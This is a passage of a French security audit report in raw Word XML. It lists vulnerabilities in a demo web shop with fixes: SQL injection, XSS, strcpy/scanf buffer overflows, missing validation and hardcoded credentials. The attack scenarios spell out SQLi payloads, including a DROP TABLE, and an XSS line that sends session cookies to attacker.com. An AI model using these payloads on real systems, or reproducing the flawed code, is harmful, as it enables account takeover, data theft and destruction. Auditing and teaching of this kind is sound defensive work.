    <w:p w:rsidRPr="00F5792E" w:rsidR="00F5792E" w:rsidP="00F5792E" w:rsidRDefault="00F5792E" w14:paraId="3145318F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:tgtFrame="_blank" w:tooltip="https://limn.press/article/the-morris-worm/" w:history="1" r:id="rId17">
        <w:r w:rsidRPr="00F5792E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>The Morris Worm — Limn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005D6E43" w:rsidP="00F5792E" w:rsidRDefault="005D6E43" w14:paraId="1E524113" w14:textId="77777777"/>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="6C6C2EAB" w14:textId="6F5277D5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E22A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partie 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E22A9" w:rsidP="000E22A9" w:rsidRDefault="000E22A9" w14:paraId="37A0777F" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="1B67ED97" w14:textId="0D282E33">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:beforeAutospacing="off" w:after="8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6"/>
          <w:szCs w:val="26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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>V-01 Injection SQL sur la connexion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="7CC571A7" w14:textId="0BEDB549">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Fichier :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server.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="6E1BC5F8" w14:textId="05FD4C0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Description : La requête SQL d'authentification est construite par concaténation directe des variables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username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et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password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sans aucun nettoyage ni échappement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="4D90411E" w14:textId="5873BAF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Code concerné :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="49A4E4F5" w14:textId="7B3B19E4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const query = `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="26561871" w14:textId="10936CBB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 SELECT * FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="28A7AC7D" w14:textId="5A76EE89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 WHERE username = '${username}'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2BADF8BF" w14:textId="1C2EEFEB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 AND password = '${password}'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="6B08087B" w14:textId="53964BC4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`;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="1D71C565" w14:textId="2FD8BECC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="621CE590" w14:textId="69E1ACE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Scénario d'attaque : En saisissant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admin' --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dans le champ utilisateur, l'attaquant commente la vérification du mot de passe. Il peut aussi utiliser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' UNION SELECT * FROM users --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pour extraire des données ou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'; DROP TABLE users; --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pour supprimer la base.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="67FB4C94" w14:textId="7192705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Impact : Accès non autorisé à des comptes (dont admin), vol de données sensibles et destruction possible de la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2E6263B3" w14:textId="6A7A635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Remédiation : Utiliser des requêtes paramétrées (prepared statements) pour séparer le code SQL des données utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="36615FDB" w14:textId="3558A62B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="03277946" w14:textId="6A8C60BE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:beforeAutospacing="off" w:after="8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6"/>
          <w:szCs w:val="26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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>V-02 XSS (Cross-Site Scripting) — Avis Clients</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2FB779E7" w14:textId="48021481">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Fichier :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index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="6B9F09FC" w14:textId="4456B17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Description : Les variables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author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et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content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sont injectées directement dans le DOM via la propriété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innerHTML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. Le navigateur interprète alors toute balise HTML ou script saisi par l'utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2491B0B4" w14:textId="700ACBF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Code concerné :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="4695C166" w14:textId="62CDFDF5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display.innerHTML += `</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2AE8A65F" w14:textId="6607C313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 &lt;div style="..."&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="51E427A5" w14:textId="312D7A02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   &lt;strong&gt;${author}&lt;/strong&gt; — ${rating}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="64907F77" w14:textId="6FE3C5F5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   &lt;p style="..."&gt;${content}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="1D4B9ABC" w14:textId="178B6C2D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 &lt;/div&gt;`;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="1E3047DE" w14:textId="6EC8A4B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="596C0737" w14:textId="4304B90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Scénario d'attaque : Un attaquant peut soumettre un avis contenant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&lt;script&gt;document.location='http://attacker.com/steal?cookie='+document.cookie&lt;/script&gt;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pour voler les cookies de session des visiteurs ou rediriger les formulaires.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="5A11495F" w14:textId="4970006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Impact : Vol de sessions, défaçage de site, redirection malveillante (phishing).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="40D8BEA7" w14:textId="01AF0EE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Remédiation : Utiliser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textContent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pour insérer du texte brut ou passer par une fonction d'échappement des caractères HTML (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&lt;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devient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&amp;lt;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, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="74FF9868" w14:textId="68A6BDF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="4D11B1D2" w14:textId="3292B912">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:beforeAutospacing="off" w:after="8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6"/>
          <w:szCs w:val="26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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>V-03 XSS (Cross-Site Scripting) — Formulaire Contact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2C7D54C7" w14:textId="38A6C738">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Fichier :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index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="17C11872" w14:textId="4D9348D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Description : Les champs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name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et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subject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du formulaire de contact sont affichés en retour à l'utilisateur via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innerHTML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sans filtrage préalable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="6AD35F18" w14:textId="6DE9303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Code concerné :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="080673BF" w14:textId="24F22681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out.innerHTML = `✅ Message de &lt;strong&gt;${name}&lt;/strong&gt; reçu.&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="6B7F44FE" w14:textId="00446BEB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 Sujet : &lt;em&gt;${subject}&lt;/em&gt;&lt;br&gt;`;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="78ADDA4F" w14:textId="0FA63BED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="4D056CFD" w14:textId="2D5FBE2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Scénario d'attaque : Injection d'une balise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&lt;img src=x onerror="alert('XSS')"&gt;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dans le champ nom. Bien que l'impact immédiat soit de type "Self-XSS", le danger devient critique si ces messages sont consultables par un administrateur dans une interface dédiée.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2046FF98" w14:textId="50210B9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Impact : Exécution de code JavaScript côté client ; risque d'escalade si le message est stocké et affiché à un tiers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="330D6196" w14:textId="15EE782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Remédiation : Utiliser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textContent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ou échapper les entrées utilisateur avant l'affichage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="4F442092" w14:textId="12C371C1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="0447656D" w14:textId="1F27AF4E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:beforeAutospacing="off" w:after="8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6"/>
          <w:szCs w:val="26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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>V-04 XSS (Cross-Site Scripting) — Résultats de Recherche</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="65E02F56" w14:textId="3B6AB3B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Fichier :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index.html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,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="0BA14423" w14:textId="37F596A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Description : Les propriétés des produits issues de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fakeDB.products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(comme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p.name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) sont insérées dans le tableau des résultats via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innerHTML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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="29EE5B14" w14:textId="56E038C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Code concerné :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="0B5A6EF7" w14:textId="7C3D6193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matched.forEach(p =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="0E74A6B6" w14:textId="13DE0E58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 tbody.innerHTML += `&lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="37F528FF" w14:textId="285C8A2B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   &lt;td&gt;${p.id}&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="237A7199" w14:textId="56F2F4DF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   &lt;td&gt;${p.name}&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="259CEBAA" w14:textId="1A30F733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   &lt;td&gt;${p.price}&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2CE3EE70" w14:textId="7E95DF41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   &lt;td&gt;${p.stock}&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="5CBA4CA2" w14:textId="113483CC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 &lt;/tr&gt;`;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="151CCB56" w14:textId="072CA11F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});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="2C1733A1" w14:textId="6A440C85">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="7C752E8B" w14:textId="7FB59EC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Scénario d'attaque : Si un attaquant parvient à modifier les données de la base (via une autre faille) pour insérer du code malveillant dans le nom d'un produit, chaque utilisateur effectuant une recherche exécutera ce code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2BF6DA1F" w14:textId="2717D94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Impact : Stored XSS (XSS Stockée) affectant potentiellement tous les utilisateurs du site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="35FF395A" w14:textId="5ED2215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Remédiation : Remplacer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innerHTML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par la création d'éléments DOM (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createElement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) et l'utilisation de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textContent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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="2DC5C0A4" w14:textId="7CDBD8DC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="3A806C54" w14:textId="234B6D93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:beforeAutospacing="off" w:after="8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6"/>
          <w:szCs w:val="26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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>V-05 Buffer Overflow sur strcpy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="1D771F9B" w14:textId="24AD76B0">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Fichier :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article.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="050796F2" w14:textId="1BB8E49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Description : La fonction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strcpy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copie la chaîne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name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dans un buffer de taille fixe (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MAX_NAME_LENGTH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= 50) sans vérifier si la source dépasse cette taille.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="746BE828" w14:textId="01346C1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Code concerné :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="0FDEA637" w14:textId="5E4D5ABF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strcpy(newArticle-&gt;name, name);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="38365A91" w14:textId="0F431C75">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="597AA734" w14:textId="47D80BE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Scénario d'attaque : Fournir un nom d'article de plus de 50 caractères. Les données supplémentaires écrasent la mémoire adjacente (variables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price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,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stock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ou l'adresse de retour sur la pile).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="57A497DC" w14:textId="534ADD7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Impact : Plantage du programme (Segmentation Fault), corruption de données ou exécution de code arbitraire.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="13CB0945" w14:textId="6CA9231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Remédiation : Utiliser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strncpy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avec une limite de taille et s'assurer de la présence du caractère de fin de chaîne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\0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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="3D1B8406" w14:textId="1E679354">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="492D4466" w14:textId="6995E6A9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:beforeAutospacing="off" w:after="8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6"/>
          <w:szCs w:val="26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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>V-06 Buffer Overflow sur scanf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="5E43153F" w14:textId="429E5F21">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Fichier :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article.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="5E834859" w14:textId="54E1CF6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Description : L'utilisation de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scanf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avec le format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%s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ne limite pas le nombre de caractères lus depuis l'entrée utilisateur, ce qui peut saturer le buffer de destination.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="2CDC5984" w14:textId="768903C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Code concerné :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="01803551" w14:textId="2D819E22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scanf("%s", newArticle-&gt;name);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="6234A68C" w14:textId="060BF8DD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="0776C33B" w14:textId="2297B8F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Scénario d'attaque : L'utilisateur saisit une chaîne très longue (ex: 200 caractères) lors de la création ou modification d'un article, dépassant les 50 octets alloués.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="58881504" w14:textId="1F7B742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Impact : Similaire à la V-05 : corruption de mémoire et possibilité de prise de contrôle du flux d'exécution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="6996282D" w14:textId="08FFCB3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Remédiation : Spécifier une largeur maximale dans le format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scanf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(ex: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%49s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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="34EAD398" w14:textId="6B9C7380">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="3E669AE6" w14:textId="71EC1838">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:beforeAutospacing="off" w:after="8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6"/>
          <w:szCs w:val="26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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>V-07 Absence de validation des entrées</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="70693E95" w14:textId="2A498159">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Fichier :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index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="56A3FAA8" w14:textId="15D9F3A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Description : La fonction de recherche traite la saisie utilisateur sans aucune vérification de longueur, de type ou de caractères spéciaux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="438A8139" w14:textId="76A6B431">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Code concerné :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="29F5B9FA" w14:textId="35D9DDA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const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 xml:space="preserve"> input = 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document.getElementById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('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search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-input').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value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="762A8982" w14:textId="235D8ABF">
      <w:pPr>
        <w:spacing w:before="24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// Pas de vérification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="457DA8D2" w14:textId="7F066738">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="70A94142" w14:textId="7ED825D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Impact : Agit comme un vecteur facilitant pour les injections SQL et XSS. Permet également l'envoi de requêtes excessivement lourdes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="3091FB0B" w14:textId="747859B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Remédiation : Implémenter un nettoyage (trim, suppression de caractères spéciaux) et une limitation de longueur sur le client et le serveur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D95A8FE" w:rsidP="0D95A8FE" w:rsidRDefault="0D95A8FE" w14:paraId="40CD0DF5" w14:textId="7BF39F9F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="0D377A1B" w14:textId="5203B2FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:beforeAutospacing="off" w:after="8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6"/>
          <w:szCs w:val="26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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>V-08 Absence de contrôle d'accès</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DE66CCC" w:rsidP="0D95A8FE" w:rsidRDefault="5DE66CCC" w14:paraId="4C16E0EF" w14:textId="70B063D6">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Fichier :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index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F9852A0" w:rsidP="0D95A8FE" w:rsidRDefault="0F9852A0" w14:paraId="6BB7EC98" w14:textId="3F890A15">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="0D95A8FE" w:rsidR="0F9852A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Code </w:t>
      </w:r>
      <w:r w:rsidRPr="0D95A8FE" w:rsidR="0F9852A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concerné</w:t>
      </w:r>
      <w:r w:rsidRPr="0D95A8FE" w:rsidR="0F9852A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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F9852A0" w:rsidP="0D95A8FE" w:rsidRDefault="0F9852A0" w14:paraId="29F5760F" w14:textId="22A9317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0F9852A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users: [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F9852A0" w:rsidP="0D95A8FE" w:rsidRDefault="0F9852A0" w14:paraId="7BFB3A2E" w14:textId="3ABB072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0F9852A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     { id: 1, login: "admin",   password: "S3cr3t!",   role: "Administrateur" },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F9852A0" w:rsidP="0D95A8FE" w:rsidRDefault="0F9852A0" w14:paraId="29E8B8C9" w14:textId="2FBC9A0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0F9852A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     { id: 2, login: "marie_t", password: "chat1234",  role: "Client" },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F9852A0" w:rsidP="0D95A8FE" w:rsidRDefault="0F9852A0" w14:paraId="40466A16" w14:textId="71B0332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0F9852A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     { id: 3, login: "jdupont", password: "azerty123", role: "Client" },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F9852A0" w:rsidP="0D95A8FE" w:rsidRDefault="0F9852A0" w14:paraId="2CB65FF8" w14:textId="765CF4F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0F9852A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    ]</w:t>
      </w:r>
    </w:p>
